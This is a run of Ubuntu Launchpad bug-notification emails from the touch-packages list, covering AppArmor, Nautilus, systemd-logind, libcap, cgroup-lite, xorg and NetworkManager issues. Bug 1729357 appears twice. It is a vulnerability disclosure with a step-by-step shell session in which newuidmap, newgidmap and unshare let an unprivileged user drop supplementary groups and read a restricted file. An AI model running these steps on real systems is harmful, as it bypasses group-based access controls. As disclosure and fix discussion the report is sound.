Public bug reported: Environment: DISTRIB_ID=Ubuntu DISTRIB_RELEASE=16.04 DISTRIB_CODENAME=xenial DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS" NAME="Ubuntu" VERSION="16.04.2 LTS (Xenial Xerus)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 16.04.2 LTS" VERSION_ID="16.04" HOME_URL="http://www.ubuntu.com/; SUPPORT_URL="http://help.ubuntu.com/; BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/; VERSION_CODENAME=xenial UBUNTU_CODENAME=xenial Docker Details: Client: Version: 17.06.2-ce API version: 1.30 Go version: go1.8.3 Git commit: cec0b72 Built:Tue Sep 5 20:00:17 2017 OS/Arch: linux/amd64 Server: Version: 17.06.2-ce API version: 1.30 (minimum version 1.12) Go version: go1.8.3 Git commit: cec0b72 Built:Tue Sep 5 19:59:11 2017 OS/Arch: linux/amd64 Experimental: false Problem: Docker containers will not restart due error /etc/apparmor.d/tunables/home.d/ubuntu at line 7: Found unexpected character: '' How to recreate problem: 1. initiate unattended upgrades: sudo unattened-upgrades -d 2. Wait until Apparmor is installing... Installing new version of config file /etc/init.d/apparmor ... Installing new version of config file /etc/init/apparmor.conf ... update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd 3. Pull the power from the computer to simulate a complete power failure. 4. Plug the system back in and try to restart a docker container using "sudo docker restart Error upon attempting to restart docker container: Error response from daemon: Cannot restart container updater-nodejs: AppArmor enabled on system but the docker-default profile could not be loaded: running /sbin/apparmor_parser apparmor_parser -Kr /var/lib/docker/tmp/docker-default480199246 failed with output: AppArmor parser error for /var/lib/docker/tmp/docker-default480199246 in /etc/apparmor.d/tunables/home.d/ubuntu at line 7: Found unexpected character: '' error: exit status 1 ** Affects: apparmor (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1778984 Title: Parse error of /etc/apparmor.d/tunables/home.d/ubuntu after unattended-upgrades Status in apparmor package in Ubuntu: New Bug description: Environment: DISTRIB_ID=Ubuntu DISTRIB_RELEASE=16.04 DISTRIB_CODENAME=xenial DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS" NAME="Ubuntu" VERSION="16.04.2 LTS (Xenial Xerus)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 16.04.2 LTS" VERSION_ID="16.04" HOME_URL="http://www.ubuntu.com/; SUPPORT_URL="http://help.ubuntu.com/; BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/; VERSION_CODENAME=xenial UBUNTU_CODENAME=xenial Docker Details: Client: Version: 17.06.2-ce API version: 1.30 Go version: go1.8.3 Git commit: cec0b72 Built:Tue Sep 5 20:00:17 2017 OS/Arch: linux/amd64 Server: Version: 17.06.2-ce API version: 1.30 (minimum version 1.12) Go version: go1.8.3 Git commit: cec0b72 Built:Tue Sep 5 19:59:11 2017 OS/Arch: linux/amd64 Experimental: false Problem: Docker containers will not restart due error /etc/apparmor.d/tunables/home.d/ubuntu at line 7: Found unexpected character: '' How to recreate problem: 1. initiate unattended upgrades: sudo unattened-upgrades -d 2. Wait until Apparmor is installing... Installing new version of config file /etc/init.d/apparmor ... Installing new version of config file /etc/init/apparmor.conf ... update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd 3. Pull the power from the computer to simulate a complete power failure. 4. Plug the system back in and try to restart a docker container using "sudo docker restart Error upon attempting to restart docker container: Error response from daemon: Cannot restart container updater-nodejs: AppArmor enabled on system but the docker-default profile could not be loaded: running /sbin/apparmor_parser apparmor_parser -Kr /var/lib/docker/tmp/docker-default480199246 failed with output: AppArmor parser error for /var/lib/docker/tmp/docker-default480199246 in /etc/apparmor.d/tunables/home.d/ubuntu at line 7: Found unexpected character: '' error: exit status 1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1778984/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1164016] Re: restore type-ahead find
Unfortunately this is really a deal-breaker for me and forces me to drop Nautilus and experiment with other, perhaps not so well developed/maintained, GUI file managers. What a pity. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ubuntu-settings in Ubuntu. https://bugs.launchpad.net/bugs/1164016 Title: restore type-ahead find Status in Nautilus: Expired Status in nautilus package in Ubuntu: Fix Released Status in ubuntu-settings package in Ubuntu: Fix Released Bug description: GNOME removed type-ahead find in Nautilus 3.6, not without controversy: https://mail.gnome.org/archives/nautilus- list/2012-August/msg2.html Now when you type in a Nautilus window, Nautilus immediately performs a search in the current directory and all its subdirectories. I personally find this annoying. If I want to search, I'll click the search icon. Often I'm looking at a long directory listing and simply want to jump to a certain point in it, and type-ahead find works great for that. Would Ubuntu consider patching type-ahead find back in? To manage notifications about this bug go to: https://bugs.launchpad.net/nautilus/+bug/1164016/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1303649] Re: systemd-logind spins in cgmanager_ping_sync()
Could you find the pid of cgmanager ( 353 below) and do Strafe -f -p 353 -o trace.txt for maybe 5 seconds, ctrl-c it, and attach trace.txt here? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1303649 Title: systemd-logind spins in cgmanager_ping_sync() Status in cgmanager package in Ubuntu: Invalid Status in libnih package in Ubuntu: Invalid Status in lxc package in Ubuntu: Fix Released Status in systemd package in Ubuntu: Fix Released Bug description: systemd-logind is consuming a high level of cpu on a continual basis: PID USER PR NIVIRTRESSHR S %CPU %MEM TIME+ COMMAND 676 root 20 0 43644 2144 1568 R 100.0 0.0 74:43.77 systemd-logind ProblemType: Bug DistroRelease: Ubuntu 14.04 Package: systemd-services 204-5ubuntu17 ProcVersionSignature: Ubuntu 3.13.0-22.44-generic 3.13.8 Uname: Linux 3.13.0-22-generic x86_64 ApportVersion: 2.14.1-0ubuntu1 Architecture: amd64 CurrentDesktop: Unity Date: Mon Apr 7 09:09:37 2014 EcryptfsInUse: Yes InstallationDate: Installed on 2013-04-23 (348 days ago) InstallationMedia: Ubuntu 13.04 "Raring Ringtail" - Release amd64 (20130423) SourcePackage: systemd UpgradeStatus: Upgraded to trusty on 2013-11-11 (146 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1303649/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1729357] Re: unprivileged user can drop supplementary groups
@stgraber @mdeslaur - I'd considered making a release for Ubuntu... but this is the negative acl thing... Your opinions appreciated. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1729357 Title: unprivileged user can drop supplementary groups Status in shadow package in Ubuntu: Confirmed Status in shadow package in openSUSE: Confirmed Bug description: Distribution: Ubuntu 16.04.3 LTS Kernel: 4.4.0-97-generic uidmap package version: 1:4.2-3.1ubuntu5.3 The newgidmap setuid executable allows any user to write a single mapping line to the gid_map of a process whose identity is the same as the calling process, as long as that mapping line maps the process's own GID outside of the user namespace to GID 0 inside the user namespace. Newgidmap will write the mapping regardless of the content of /proc/$process_being_mapped/setgroups, which will initially contain the string "allow". After this mapping is performed, and also after the process' uid_map is written with newuidmap, the process in the user namespace will be able to use the setgroups system call to drop supplementary groups. This is possible even if there is no entry for the user in /etc/subgid, because no subordinate GIDs are actually being used. This allows any user to circumvent the use of supplementary groups as blacklists, e.g. for some file owned by root:blacklist with permission bits 0604 (octal). Normally any process whose identity included the group "blacklist" in its supplementary groups would not be able to read that file. By performing this exploit using newgidmap, they can drop all supplementary groups and read that file. If newgidmap was not available, unprivileged users would not be able to write a process's gid_map until writing "deny" to /proc/$pid/setgroups. A fix for this might be for newgidmap to check the content of /proc/$process_being_mapped/setgroups is "deny", but we have not tried to patch this ourselves. An example using 2 login shells for a user named "someone" on Ubuntu Xenial, with the uidmap package installed: Shell 1 someone@ubuntu-xenial:~$ id uid=1001(someone) gid=1001(someone) groups=1001(someone),1002(restricted) someone@ubuntu-xenial:~$ ls -al /tmp/should_restrict -rwr-- 1 root restricted 8 Nov 1 12:23 /tmp/should_restrict someone@ubuntu-xenial:~$ cat /tmp/should_restrict cat: /tmp/should_restrict: Permission denied someone@ubuntu-xenial:~$ unshare -U --setgroups allow # /proc/self/setgroups already contains 'allow', but let's be explicit nobody@ubuntu-xenial:~$ echo $$ 1878 Shell 2 someone@ubuntu-xenial:~$ cat /etc/subuid lxd:10:65536 root:10:65536 ubuntu:165536:65536 someone@ubuntu-xenial:~$ cat /etc/subgid lxd:10:65536 root:10:65536 ubuntu:165536:65536 # There are no entries in /etc/sub{u,g}id for someone, but this doesn't matter that much as subordinate IDs are not being requested. someone@ubuntu-xenial:~$ newuidmap 1878 0 1001 1 someone@ubuntu-xenial:~$ newgidmap 1878 0 1001 1 Back to shell 1 nobody@ubuntu-xenial:~$ id uid=0(root) gid=0(root) groups=0(root),65534(nogroup) # The presence of the "nogroup" supplementary group indicates that some unmapped GIDs are present as supplementary GIDs. The kernel knows that this process still has "restricted" in its supplementary groups, so it can't read the restricted file yet. nobody@ubuntu-xenial:~$ cat /tmp/should_restrict cat: /tmp/should_restrict: Permission denied # The process has gained CAP_SETGID in its user namespace by becoming UID 0. /proc/$pid/setgroups contains "allow", so it can call setgroups(2). By su-ing to root (itself, in the user namespace), it can drop the supplementary groups. It can't read /root/.bashrc as that file is owned by UID 0 in the initial user namespace, which creates some distracting error output but doesn't matter in this case. nobody@ubuntu-xenial:~$ su root su: Authentication failure (Ignored) bash: /root/.bashrc: Permission denied # Supplementary groups have been dropped root@ubuntu-xenial:~# id uid=0(root) gid=0(root) groups=0(root) # It can read the restricted file root@ubuntu-xenial:~# cat /tmp/should_restrict content To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1303649] Re: systemd-logind spins in cgmanager_ping_sync()
Hi, just to get this straight to narrow down scenarios to try to reproduce: 1. Dale with 16.04 you are *not* seeing this, right? You saw it with 14.04 with proposed enabled? 2. Marcelo, you are seeing this with 14.04.5 with proposed enabled? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1303649 Title: systemd-logind spins in cgmanager_ping_sync() Status in cgmanager package in Ubuntu: Invalid Status in libnih package in Ubuntu: Invalid Status in lxc package in Ubuntu: Fix Released Status in systemd package in Ubuntu: Fix Released Bug description: systemd-logind is consuming a high level of cpu on a continual basis: PID USER PR NIVIRTRESSHR S %CPU %MEM TIME+ COMMAND 676 root 20 0 43644 2144 1568 R 100.0 0.0 74:43.77 systemd-logind ProblemType: Bug DistroRelease: Ubuntu 14.04 Package: systemd-services 204-5ubuntu17 ProcVersionSignature: Ubuntu 3.13.0-22.44-generic 3.13.8 Uname: Linux 3.13.0-22-generic x86_64 ApportVersion: 2.14.1-0ubuntu1 Architecture: amd64 CurrentDesktop: Unity Date: Mon Apr 7 09:09:37 2014 EcryptfsInUse: Yes InstallationDate: Installed on 2013-04-23 (348 days ago) InstallationMedia: Ubuntu 13.04 "Raring Ringtail" - Release amd64 (20130423) SourcePackage: systemd UpgradeStatus: Upgraded to trusty on 2013-11-11 (146 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1303649/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1700814] Re: Default capability of cap_setfcap+i should be set on setcap
Even unprivileged containers are now usable in containers with the right kernel, so this would be a good thing to add to the packaging. I'm not sure when I'll have time, but assigning to myself so that I can more easily find it when I do. ** Changed in: libcap2 (Ubuntu) Assignee: (unassigned) => Serge Hallyn (serge-hallyn) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcap2 in Ubuntu. https://bugs.launchpad.net/bugs/1700814 Title: Default capability of cap_setfcap+i should be set on setcap Status in libcap2 package in Ubuntu: New Bug description: If I grant a user (via pam_cap) cap_setfcap+i, I would then expect them to be able to use setcap without sudo. setcap is not provided with any default file capabilities however, so either the user has to sudo, or I have to grant the setfcap capability to setcap with setcap. In my mind, it would be reasonable to grant setfcap+i to setcap by default on installation. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libcap2/+bug/1700814/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1704416] Re: CAP_AUDIT_READ is not supported on Xenial
Sorry - if this is still an issue, please reply here. ** Changed in: libcap2 (Ubuntu) Assignee: (unassigned) => Serge Hallyn (serge-hallyn) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcap2 in Ubuntu. https://bugs.launchpad.net/bugs/1704416 Title: CAP_AUDIT_READ is not supported on Xenial Status in libcap2 package in Ubuntu: New Bug description: I'm encountering the same issue as #1451601 describes. The fix, a more recent libcap2 2.25, has made it into the Yakkety distribution but not Xenial. Summary of the problem: One cannot raise or lower CAP_AUDIT_READ, which is equal to decimal value 37. As compiled, libcap2 2.24 supports up to CAP_BLOCK_SUSPEND (36). lsb_release -rd Description: Ubuntu 16.04.2 LTS Release: 16.04 apt-cache policy libcap2 libcap2: Installed: 1:2.24-12 Candidate: 1:2.24-12 Version table: *** 1:2.24-12 500 500 http://us.archive.ubuntu.com/ubuntu xenial/main amd64 Packages 100 /var/lib/dpkg/status setcap cap_audit_read=eip /bin/ls fatal error: Invalid argument usage: setcap [-q] [-v] (-r|-|) [ ... (-r|-|) ] Note must be a regular (non-symlink) file. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libcap2/+bug/1704416/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1729357] Re: unprivileged user can drop supplementary groups
This sounds acceptable to me. Issues or (even better) PRs against github.com/shadow-maint/shadow would be great :) Indeed the default should be the more permissible. (I won't accept patches which require changes to the container runtime.) On Mon, Jan 15, 2018 at 9:13 AM, Akihiro Sudawrote: >> And we define flags "allow_setgroups" and "deny_setgrouops" (with > "deny_setgroups" being the default). > > > I think allow_setgropus should be the default for keeping compatibility. > > However, useradd(8) may print warning for the default configuration. > > -- > You received this bug notification because you are subscribed to the bug > report. > https://bugs.launchpad.net/bugs/1729357 > > Title: > unprivileged user can drop supplementary groups > > Status in shadow package in Ubuntu: > Confirmed > > Bug description: > Distribution: Ubuntu 16.04.3 LTS > Kernel: 4.4.0-97-generic > uidmap package version: 1:4.2-3.1ubuntu5.3 > > The newgidmap setuid executable allows any user to write a single > mapping line to the gid_map of a process whose identity is the same as > the calling process, as long as that mapping line maps the process's > own GID outside of the user namespace to GID 0 inside the user > namespace. > > Newgidmap will write the mapping regardless of the content of > /proc/$process_being_mapped/setgroups, which will initially contain > the string "allow". After this mapping is performed, and also after > the process' uid_map is written with newuidmap, the process in the > user namespace will be able to use the setgroups system call to drop > supplementary groups. > > This is possible even if there is no entry for the user in > /etc/subgid, because no subordinate GIDs are actually being used. > > This allows any user to circumvent the use of supplementary groups as > blacklists, e.g. for some file owned by root:blacklist with permission > bits 0604 (octal). Normally any process whose identity included the > group "blacklist" in its supplementary groups would not be able to > read that file. By performing this exploit using newgidmap, they can > drop all supplementary groups and read that file. > > If newgidmap was not available, unprivileged users would not be able > to write a process's gid_map until writing "deny" to > /proc/$pid/setgroups. A fix for this might be for newgidmap to check > the content of /proc/$process_being_mapped/setgroups is "deny", but we > have not tried to patch this ourselves. > > An example using 2 login shells for a user named "someone" on Ubuntu > Xenial, with the uidmap package installed: > > Shell 1 > > someone@ubuntu-xenial:~$ id > uid=1001(someone) gid=1001(someone) groups=1001(someone),1002(restricted) > > someone@ubuntu-xenial:~$ ls -al /tmp/should_restrict > -rwr-- 1 root restricted 8 Nov 1 12:23 /tmp/should_restrict > > someone@ubuntu-xenial:~$ cat /tmp/should_restrict > cat: /tmp/should_restrict: Permission denied > > someone@ubuntu-xenial:~$ unshare -U --setgroups allow # > /proc/self/setgroups already contains 'allow', but let's be explicit > > nobody@ubuntu-xenial:~$ echo $$ > 1878 > > Shell 2 > > someone@ubuntu-xenial:~$ cat /etc/subuid > lxd:10:65536 > root:10:65536 > ubuntu:165536:65536 > > someone@ubuntu-xenial:~$ cat /etc/subgid > lxd:10:65536 > root:10:65536 > ubuntu:165536:65536 > > # There are no entries in /etc/sub{u,g}id for someone, but this > doesn't matter that much as subordinate IDs are not being requested. > > someone@ubuntu-xenial:~$ newuidmap 1878 0 1001 1 > > someone@ubuntu-xenial:~$ newgidmap 1878 0 1001 1 > > Back to shell 1 > > nobody@ubuntu-xenial:~$ id > uid=0(root) gid=0(root) groups=0(root),65534(nogroup) > > # The presence of the "nogroup" supplementary group indicates that > some unmapped GIDs are present as supplementary GIDs. The kernel knows > that this process still has "restricted" in its supplementary groups, > so it can't read the restricted file yet. > > nobody@ubuntu-xenial:~$ cat /tmp/should_restrict > cat: /tmp/should_restrict: Permission denied > > # The process has gained CAP_SETGID in its user namespace by becoming > UID 0. /proc/$pid/setgroups contains "allow", so it can call > setgroups(2). By su-ing to root (itself, in the user namespace), it > can drop the supplementary groups. It can't read /root/.bashrc as that > file is owned by UID 0 in the initial user namespace, which creates > some distracting error output but doesn't matter in this case. > > nobody@ubuntu-xenial:~$ su root > su: Authentication failure > (Ignored) > bash: /root/.bashrc: Permission denied > > # Supplementary groups have been dropped > > root@ubuntu-xenial:~# id > uid=0(root) gid=0(root) groups=0(root) > > # It can read the restricted file > > root@ubuntu-xenial:~# cat /tmp/should_restrict > content > > To manage notifications about this bug go
[Touch-packages] [Bug 1730019] [NEW] Mouse/pointer missing after resume from sleep
Public bug reported: After waking the machine up, I am no longer able to use the mouse as the pointer does not respond. Only a hard reboot fixes this. ProblemType: Bug DistroRelease: Ubuntu 17.10 Package: xorg 1:7.7+19ubuntu3 ProcVersionSignature: Ubuntu 4.13.0-16.19-generic 4.13.4 Uname: Linux 4.13.0-16-generic x86_64 NonfreeKernelModules: wl .tmp.unity_support_test.0: ApportVersion: 2.20.7-0ubuntu3.1 Architecture: amd64 CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Fri Nov 3 18:19:46 2017 DistUpgraded: Fresh install DistroCodename: artful DistroVariant: ubuntu DkmsStatus: bcmwl, 6.30.223.271+bdcom, 4.13.0-16-generic, x86_64: installed ExtraDebuggingInterest: Yes, including running git bisection searches GraphicsCard: Intel Corporation HD Graphics 5300 [8086:161e] (rev 09) (prog-if 00 [VGA controller]) Subsystem: Lenovo HD Graphics 5300 [17aa:3906] InstallationDate: Installed on 2017-11-02 (1 days ago) InstallationMedia: Ubuntu 17.10 "Artful Aardvark" - Release amd64 (20171018) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 004: ID 048d:8386 Integrated Technology Express, Inc. Bus 001 Device 003: ID 5986:0535 Acer, Inc Bus 001 Device 002: ID 0489:e07a Foxconn / Hon Hai Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: LENOVO 80HE ProcEnviron: PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-4.13.0-16-generic root=/dev/mapper/ubuntu--vg-root ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 08/06/2015 dmi.bios.vendor: LENOVO dmi.bios.version: A6CN58WW dmi.board.asset.tag: NO Asset Tag dmi.board.name: VIUU4 dmi.board.vendor: LENOVO dmi.board.version: SDK0J40709 WIN dmi.chassis.asset.tag: NO Asset Tag dmi.chassis.type: 10 dmi.chassis.vendor: LENOVO dmi.chassis.version: Lenovo YOGA 3 Pro-1370 dmi.modalias: dmi:bvnLENOVO:bvrA6CN58WW:bd08/06/2015:svnLENOVO:pn80HE:pvrLenovoYOGA3Pro-1370:rvnLENOVO:rnVIUU4:rvrSDK0J40709WIN:cvnLENOVO:ct10:cvrLenovoYOGA3Pro-1370: dmi.product.family: IDEAPAD dmi.product.name: 80HE dmi.product.version: Lenovo YOGA 3 Pro-1370 dmi.sys.vendor: LENOVO version.compiz: compiz 1:0.9.13.1+17.10.20170901-0ubuntu1 version.libdrm2: libdrm2 2.4.83-1 version.libgl1-mesa-dri: libgl1-mesa-dri 17.2.2-0ubuntu1 version.libgl1-mesa-glx: libgl1-mesa-glx 17.2.2-0ubuntu1 version.xserver-xorg-core: xserver-xorg-core 2:1.19.5-0ubuntu2 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:7.10.0-1 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20170309-0ubuntu1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.15-2 ** Affects: xorg (Ubuntu) Importance: Undecided Status: New ** Tags: amd64 apport-bug artful ubuntu wayland-session -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1730019 Title: Mouse/pointer missing after resume from sleep Status in xorg package in Ubuntu: New Bug description: After waking the machine up, I am no longer able to use the mouse as the pointer does not respond. Only a hard reboot fixes this. ProblemType: Bug DistroRelease: Ubuntu 17.10 Package: xorg 1:7.7+19ubuntu3 ProcVersionSignature: Ubuntu 4.13.0-16.19-generic 4.13.4 Uname: Linux 4.13.0-16-generic x86_64 NonfreeKernelModules: wl .tmp.unity_support_test.0: ApportVersion: 2.20.7-0ubuntu3.1 Architecture: amd64 CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Fri Nov 3 18:19:46 2017 DistUpgraded: Fresh install DistroCodename: artful DistroVariant: ubuntu DkmsStatus: bcmwl, 6.30.223.271+bdcom, 4.13.0-16-generic, x86_64: installed ExtraDebuggingInterest: Yes, including running git bisection searches GraphicsCard: Intel Corporation HD Graphics 5300 [8086:161e] (rev 09) (prog-if 00 [VGA controller]) Subsystem: Lenovo HD Graphics 5300 [17aa:3906] InstallationDate: Installed on 2017-11-02 (1 days ago) InstallationMedia: Ubuntu 17.10 "Artful Aardvark" - Release amd64 (20171018) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 004: ID 048d:8386 Integrated Technology Express, Inc. Bus 001 Device 003: ID 5986:0535 Acer, Inc Bus 001 Device 002: ID 0489:e07a Foxconn / Hon Hai Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: LENOVO 80HE ProcEnviron: PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-4.13.0-16-generic root=/dev/mapper/ubuntu--vg-root ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 08/06/2015
[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04
Drat. I do think this should still be pushed. I don't know when I'll have time to do it though. Please keep it open. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu. https://bugs.launchpad.net/bugs/1668724 Title: fails to mount cgroupfs inside containers running on 16.04 Status in cgroup-lite package in Ubuntu: Fix Released Status in cgroup-lite source package in Precise: Won't Fix Status in cgroup-lite source package in Trusty: Incomplete Status in cgroup-lite source package in Xenial: Incomplete Status in cgroup-lite source package in Yakkety: Won't Fix Bug description: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. === SRU Justification Impact: nested containers fail to start Reproduce: create a root owned container; install lxc and cgroup-lite; create a container, and try to start it. Starting will fail if cgroup-lite is running in the first level container without this patch. Regression potential: should be low, it's possible that the regexp is simply wrong for some cases. === To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1668724] Re: fails to mount cgroupfs inside containers running on 16.04
I'll still aim to push this for trusty and xenial. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to cgroup-lite in Ubuntu. https://bugs.launchpad.net/bugs/1668724 Title: fails to mount cgroupfs inside containers running on 16.04 Status in cgroup-lite package in Ubuntu: Fix Released Status in cgroup-lite source package in Precise: Won't Fix Status in cgroup-lite source package in Trusty: Incomplete Status in cgroup-lite source package in Xenial: Incomplete Status in cgroup-lite source package in Yakkety: Won't Fix Bug description: I need to run nested Ubuntu 12.04 and 14.04 containers on 16.04 hosts, and have noticed that the cgroups-mount script for mounting the cgroups inside the containers has stopped working. This is because systemd now comounts multiple controllers on a single hierarchy, which prevents mounting them individually inside the container. === SRU Justification Impact: nested containers fail to start Reproduce: create a root owned container; install lxc and cgroup-lite; create a container, and try to start it. Starting will fail if cgroup-lite is running in the first level container without this patch. Regression potential: should be low, it's possible that the regexp is simply wrong for some cases. === To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgroup-lite/+bug/1668724/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 737615] Re: Can't save changes in "Edit Connections..." for Wi-Fi networks to which one doesn't have the password
*** This bug is a duplicate of bug 1409866 *** https://bugs.launchpad.net/bugs/1409866 The problem is in the settings of the connection, but unfortunates the manager does not display this information. SOLUTION: - start nm-connection-editor from the terminal (sudo is possible, bus probably not necessary). - open the connection settings as usual in the popped-up manager - The exact error message will be printed in the terminal, read it. - Fix the error and the buttons will be available again. EXAMPLE OUTPUT in the terminal (in German in my case and I had to mark Certificate as ignored ): ** Message: Cannot save connection due to error: Editors wird initialisiert … ** Message: Cannot save connection due to error: ungültige Einstellung Sicherheit des Funknetzwerks: Ungültiges EAP-PEAP-CA-Zertifikat: Kein Zertifikat angegeben ** Message: Cannot save connection due to error: ungültige Einstellung IPv4-Einstellungen: ipv4.addresses: Diese Eigenschaft darf nicht für »method=manual« leer sein -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to network-manager in Ubuntu. https://bugs.launchpad.net/bugs/737615 Title: Can't save changes in "Edit Connections..." for Wi-Fi networks to which one doesn't have the password Status in Linux: Unknown Status in NetworkManager: Unknown Status in network-manager package in Ubuntu: Confirmed Status in network-manager package in Debian: New Bug description: Binary package hint: network-manager Steps to reproduce: 1) Right-click on Network Manager's tray icon 2) select "edit connections" 3) go to the "wireless" tab 4) select any connection in the list, except the one you are currently connected to 5) Click "Edit" 5) Change some settings Expected: there should be some way to save those changes Observed: the "Apply" button is greyed out. There is no "Save" button. If you hit Cancel, obviously the changes are discarded. If you edit the network you are connected to, the Apply button works, but why on earth are'n you allowed to save changes to a network you are not connected to? And if there was a reason why you can't, then why are you allowed to edit in the first place? ProblemType: Bug DistroRelease: Ubuntu 10.04 Package: network-manager 0.8-0ubuntu3 ProcVersionSignature: Ubuntu 2.6.32-29.58-generic 2.6.32.28+drm33.13 Uname: Linux 2.6.32-29-generic i686 NonfreeKernelModules: nvidia Architecture: i386 CRDA: Error: [Errno 2] No such file or directory Date: Fri Mar 18 14:47:06 2011 IfupdownConfig: auto lo iface lo inet loopback InstallationMedia: Ubuntu 10.04 LTS "Lucid Lynx" - Release i386 (20100429) IpRoute: 192.168.2.0/24 dev wlan0 proto kernel scope link src 192.168.2.105 metric 2 169.254.0.0/16 dev wlan0 scope link metric 1000 default via 192.168.2.1 dev wlan0 proto static Keyfiles: Error: [Errno 2] No such file or directory ProcEnviron: PATH=(custom, no user) LANG=en_US.utf8 SHELL=/bin/bash SourcePackage: network-manager To manage notifications about this bug go to: https://bugs.launchpad.net/linux/+bug/737615/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 882147] Re: overlayfs does not implement inotify interfaces correctly
